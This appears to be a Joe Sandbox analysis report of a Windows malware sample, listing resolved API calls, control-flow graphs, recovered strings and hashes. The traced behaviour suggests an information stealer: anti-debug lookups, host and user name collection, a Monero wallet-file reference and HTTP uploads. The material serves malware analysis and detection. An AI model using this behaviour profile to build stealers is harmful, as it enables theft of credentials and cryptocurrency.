a46d63 16320->16321 16335 a46d59 16320->16335 16336 a46530 16321->16336 16325 a46dbe 16325->16335 16346 a469b0 16325->16346 16327 a46e2a 16328 a46ee6 VirtualFree 16327->16328 16330 a46ef7 16327->16330 16327->16335 16328->16330 16329 a46f41 16333 a589f0 2 API calls 16329->16333 16329->16335 16330->16329 16331 a46f26 FreeLibrary 16330->16331 16332 a46f38 16330->16332 16331->16330 16334 a589f0 2 API calls 16332->16334 16333->16335 16334->16329 16335->16316 16337 a46542 16336->16337 16339 a46549 16337->16339 16356 a58a10 GetProcessHeap RtlAllocateHeap 16337->16356 16339->16335 16340 a46660 16339->16340 16343 a4668f VirtualAlloc 16340->16343 16342 a46730 16344 a46743 VirtualAlloc 16342->16344 16345 a4673c 16342->16345 16343->16342 16343->16345 16344->16345 
16345->16325 16347 a469c9 16346->16347 16351 a469d5 16346->16351 16348 a46a09 LoadLibraryA 16347->16348 16347->16351 16349 a46a32 16348->16349 16348->16351 16354 a46ae0 16349->16354 16357 a58a10 GetProcessHeap RtlAllocateHeap 16349->16357 16351->16327 16352 a46a8b 16352->16351 16355 a589f0 2 API calls 16352->16355 16353 a46ba8 GetProcAddress 16353->16351 16353->16354 16354->16351 16354->16353 16355->16354 16356->16339 16357->16352

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 660 a59860-a59874 call a59750 663 a59a93-a59af2 LoadLibraryA * 5 660->663 664 a5987a-a59a8e call a59780 GetProcAddress * 21 660->664 666 a59af4-a59b08 GetProcAddress 663->666 667 a59b0d-a59b14 663->667 664->663 666->667 669 a59b46-a59b4d 667->669 670 a59b16-a59b41 GetProcAddress * 2 667->670 671 a59b4f-a59b63 GetProcAddress 669->671 672 a59b68-a59b6f 669->672 670->669 671->672 673 a59b71-a59b84 GetProcAddress 672->673 674 a59b89-a59b90 672->674 673->674 675 a59bc1-a59bc2 674->675 676 a59b92-a59bbc GetProcAddress * 2 674->676 676->675
                                        APIs
                                        • GetProcAddress.KERNEL32(75900000,01600CD8), ref: 00A598A1
                                        • GetProcAddress.KERNEL32(75900000,01600E10), ref: 00A598BA
                                        • GetProcAddress.KERNEL32(75900000,01600C60), ref: 00A598D2
                                        • GetProcAddress.KERNEL32(75900000,01600ED0), ref: 00A598EA
                                        • GetProcAddress.KERNEL32(75900000,01600E28), ref: 00A59903
                                        • GetProcAddress.KERNEL32(75900000,01608FF8), ref: 00A5991B
                                        • GetProcAddress.KERNEL32(75900000,015F6A00), ref: 00A59933
                                        • GetProcAddress.KERNEL32(75900000,015F6740), ref: 00A5994C
                                        • GetProcAddress.KERNEL32(75900000,01600CF0), ref: 00A59964
                                        • GetProcAddress.KERNEL32(75900000,01600E40), ref: 00A5997C
                                        • GetProcAddress.KERNEL32(75900000,01600F00), ref: 00A59995
                                        • GetProcAddress.KERNEL32(75900000,01600E70), ref: 00A599AD
                                        • GetProcAddress.KERNEL32(75900000,015F6900), ref: 00A599C5
                                        • GetProcAddress.KERNEL32(75900000,01600C78), ref: 00A599DE
                                        • GetProcAddress.KERNEL32(75900000,01600D38), ref: 00A599F6
                                        • GetProcAddress.KERNEL32(75900000,015F68C0), ref: 00A59A0E
                                        • GetProcAddress.KERNEL32(75900000,01600E88), ref: 00A59A27
                                        • GetProcAddress.KERNEL32(75900000,01600F90), ref: 00A59A3F
                                        • GetProcAddress.KERNEL32(75900000,015F67A0), ref: 00A59A57
                                        • GetProcAddress.KERNEL32(75900000,01601008), ref: 00A59A70
                                        • GetProcAddress.KERNEL32(75900000,015F6A20), ref: 00A59A88
                                        • LoadLibraryA.KERNEL32(01600F60,?,00A56A00), ref: 00A59A9A
                                        • LoadLibraryA.KERNEL32(01600FC0,?,00A56A00), ref: 00A59AAB
                                        • LoadLibraryA.KERNEL32(01601020,?,00A56A00), ref: 00A59ABD
                                        • LoadLibraryA.KERNEL32(01600FD8,?,00A56A00), ref: 00A59ACF
                                        • LoadLibraryA.KERNEL32(01600F78,?,00A56A00), ref: 00A59AE0
                                        • GetProcAddress.KERNEL32(75070000,01600FA8), ref: 00A59B02
                                        • GetProcAddress.KERNEL32(75FD0000,01600FF0), ref: 00A59B23
                                        • GetProcAddress.KERNEL32(75FD0000,016094F8), ref: 00A59B3B
                                        • GetProcAddress.KERNEL32(75A50000,01609360), ref: 00A59B5D
                                        • GetProcAddress.KERNEL32(74E50000,015F6820), ref: 00A59B7E
                                        • GetProcAddress.KERNEL32(76E80000,01608F68), ref: 00A59B9F
                                        • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00A59BB6
                                        Strings
                                        • NtQueryInformationProcess, xrefs: 00A59BAA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: NtQueryInformationProcess
                                        • API String ID: 2238633743-2781105232
                                        • Opcode ID: d4a59f602f4bfed9a7dbf046dc4d4abd8675d9508552893d2af30293f120fdc1
                                        • Instruction ID: 7963dd17b8e8aafce89e45cf7deda8877dbbc1c2229077dce0d60da07d12602a
                                        • Opcode Fuzzy Hash: d4a59f602f4bfed9a7dbf046dc4d4abd8675d9508552893d2af30293f120fdc1
                                        • Instruction Fuzzy Hash: D5A12BB5500240AFF344EFA9ED88B5E37F9F78C701704451BE609D32A4D739A852EB6A

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 677 a445c0-a44695 RtlAllocateHeap 694 a446a0-a446a6 677->694 695 a446ac-a4474a 694->695 696 a4474f-a447a9 VirtualProtect 694->696 695->694
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A4460E
                                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00A4479C
                                        Strings
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A44713
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A44734
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A44765
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A446D8
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A445C7
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A445D2
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A44770
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A445E8
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A4474F
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A446C2
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A44638
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A44622
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A446B7
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A44657
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A4477B
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A44678
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A446CD
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A4475A
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A44683
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A44617
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A44643
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A44729
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A4462D
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A4466D
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A44662
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A445DD
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A4473F
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A4471E
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A445F3
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A446AC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeapProtectVirtual
                                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                        • API String ID: 1542196881-2218711628
                                        • Opcode ID: e688f9d347356f896a888af6464c8b013c09d05ce864637262cf055c9076fdf6
                                        • Instruction ID: b5aff87f21487925bcad95a7f5fc97a5739ae03d128849ccd04088b51ea99fb1
                                        • Opcode Fuzzy Hash: e688f9d347356f896a888af6464c8b013c09d05ce864637262cf055c9076fdf6
                                        • Instruction Fuzzy Hash: F241E261BD660DFAC664FFF4F84EE9D76B67FDAB00F905844E810532D0CAB065004926

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00A5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A5A7E6
                                          • Part of subcall function 00A447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A44839
                                          • Part of subcall function 00A447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00A44849
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00A44915
                                        • StrCmpCA.SHLWAPI(?,0160E9B0), ref: 00A4493A
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A44ABA
                                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00A60DDB,00000000,?,?,00000000,?,",00000000,?,0160EA20), ref: 00A44DE8
                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00A44E04
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00A44E18
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00A44E49
                                        • InternetCloseHandle.WININET(00000000), ref: 00A44EAD
                                        • InternetCloseHandle.WININET(00000000), ref: 00A44EC5
                                        • HttpOpenRequestA.WININET(00000000,0160EB70,?,0160E578,00000000,00000000,00400100,00000000), ref: 00A44B15
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                          • Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
                                          • Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
                                        • InternetCloseHandle.WININET(00000000), ref: 00A44ECF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                        • String ID: "$"$------$------$------
                                        • API String ID: 460715078-2180234286
                                        • Opcode ID: 724a4c3c544b882c8ab98115026ff050bc7a2453f40e5583aaf12171c8c20b95
                                        • Instruction ID: 776f8bfc92f52d1495e3a43557c2f89761b3207d0b36c4192984cadcf43a8f62
                                        • Opcode Fuzzy Hash: 724a4c3c544b882c8ab98115026ff050bc7a2453f40e5583aaf12171c8c20b95
                                        • Instruction Fuzzy Hash: 3012FA72A10118AADB15EB90DE92FEEB778BF64301F504299B50662091EF702F4DCF66
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A57910
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A57917
                                        • GetComputerNameA.KERNEL32(?,00000104), ref: 00A5792F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateComputerNameProcess
                                        • String ID:
                                        • API String ID: 1664310425-0
                                        • Opcode ID: f1cd486acb3c4e8cf3d0c83dc47072a8dcf2059b2a78fbae7a6c8bae1580de1c
                                        • Instruction ID: 1d4f021422acc558201640b65ac9af362d5419cdd88c718275919088b17814f4
                                        • Opcode Fuzzy Hash: f1cd486acb3c4e8cf3d0c83dc47072a8dcf2059b2a78fbae7a6c8bae1580de1c
                                        • Instruction Fuzzy Hash: A80181B1A04208EBD750DF98DD45FAEFBB8FB04B22F10421AFA55E3280C37459048BB1
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00A411B7), ref: 00A57880
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A57887
                                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00A5789F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateNameProcessUser
                                        • String ID:
                                        • API String ID: 1296208442-0
                                        • Opcode ID: 72133e0f2f0b5336384c366ec1094b76867be5dfb40a8c4122fab703959b714f
                                        • Instruction ID: 17e3499240732c73b2be8090eddbbb9a47597e87117a2b84dfa8336044ae1860
                                        • Opcode Fuzzy Hash: 72133e0f2f0b5336384c366ec1094b76867be5dfb40a8c4122fab703959b714f
                                        • Instruction Fuzzy Hash: EAF04FB1944208ABD710DF98DD49BAEBBB8FB04711F10065AFA05A2680C77415448BA1
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitInfoProcessSystem
                                        • String ID:
                                        • API String ID: 752954902-0
                                        • Opcode ID: f8b9510de722942b4f1aa8f0f1a211eee9dc9e4198838dea20ef75173ffc89a4
                                        • Instruction ID: af879bd3a96e66a7e7026c8d42130bcb8feb6b965bd0f1ad1f048376de3c0963
                                        • Opcode Fuzzy Hash: f8b9510de722942b4f1aa8f0f1a211eee9dc9e4198838dea20ef75173ffc89a4
